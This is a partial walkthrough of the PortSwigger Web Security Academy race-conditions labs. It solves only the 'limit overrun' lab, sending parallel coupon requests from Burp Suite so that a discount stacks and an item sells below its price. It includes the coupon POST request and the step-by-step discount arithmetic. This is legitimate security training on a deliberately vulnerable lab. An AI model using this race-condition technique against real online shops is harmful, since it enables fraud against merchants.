IN PROGRESS: WebSecurityAcademy (PortSwigger) – Race conditions

Walk-through of the Race conditions vulnerabilities lab on PortSwigger Web Security Academy.

Apprentice – Limit overrun race conditions

This lab’s purchasing flow contains a race condition that enables you to purchase items for an unintended price. To solve the lab, successfully purchase a Lightweight L33t Leather Jacket. You can log in to your account with the following credentials: wiener:peter.

There is a banner at the top of the page with promo code “PROMO20” for 20% off.

  • Click on My account and log in with credentials wiener/peter.
  • On the Home page, click on View details under the lightweight leather jacket.
  • Click Add to cart.
  • Click on the cart.
  • Add coupon code “PROMO20”. Try adding the coupon again. It does not work.
  • Remove the coupon.
  • Intercept request in Burp Suite.
  • Add coupon code “PROMO20” and click Apply. Do NOT forward the request. Send it to the Repeater module instead.
  • From the Repeater, right-click on the request and click Add tab to group -> Create tab group. Choose a name like “Race condition”.
POST /cart/coupon HTTP/2
Host: <LAB ID>.web-security-academy.net
[...]

csrf=kjCPAxxK9QDRPoFjczfK2eqTtzfI6tSV&coupon=PROMO20

The jacket costs $1337 but we only have $50 of store credit. The promo code gives 20% off, so item price is at 80%.

  • Coupon 1: $1337 x 0.8 = $1069.60
  • Coupon 2: $1069.60 x 0.8 = $855.68
  • Coupon 3: $855.68 x 0.8 = $684.54
  • Coupon 4: $684.54 x 0.8 = $547.64
  • Coupon 5: $547.64 x 0.8 = $438.11
  • Coupon 6: $438.11 x 0.8 = $350.49
  • Coupon 7: $350.49 x 0.8 = $280.39
  • Coupon 8: $280.39 x 0.8 = $224.31
  • Coupon 9: $224.31 x 0.8 = $179.45
  • Coupon 10: $179.45 x 0.8 = $143.56
  • Coupon 11: $143.56 x 0.8 = $114.85
  • Coupon 12: $114.85 x 0.8 = $91.88
  • Coupon 13: $91.88 x 0.8 = $73.50
  • Coupon 14: $73.50 x 0.8 = $58.80
  • Coupon 15: $58.80 x 0.8 = $47.04

We need to apply the coupon code 15 times.

  • Right-click on the request in the Repeater and Send to Repeater again in the same tab group. Do the same step until there are 15 requests in the tab for adding the coupon.
  • Click on the first request, click on the arrow beside Send and select Send group in parallel (single-packet attack).
  • Click on Send group (parallel).
  • Refresh the cart and check the order total. If the order total is still higher than your remaining store credit, remove the discount codes and repeat the attack. If the order total is less than your remaining store credit, purchase the jacket to solve the lab. You may need to add more than 15 requests to get the right total (try 20 requests).

Practitioner – Bypassing rate limits via race conditions

Practitioner – Multi-endpoint race conditions

Practitioner – Single-endpoint race conditions

Practitioner – Exploiting time-sensitive vulnerabilities

Expert – Partial construction race conditions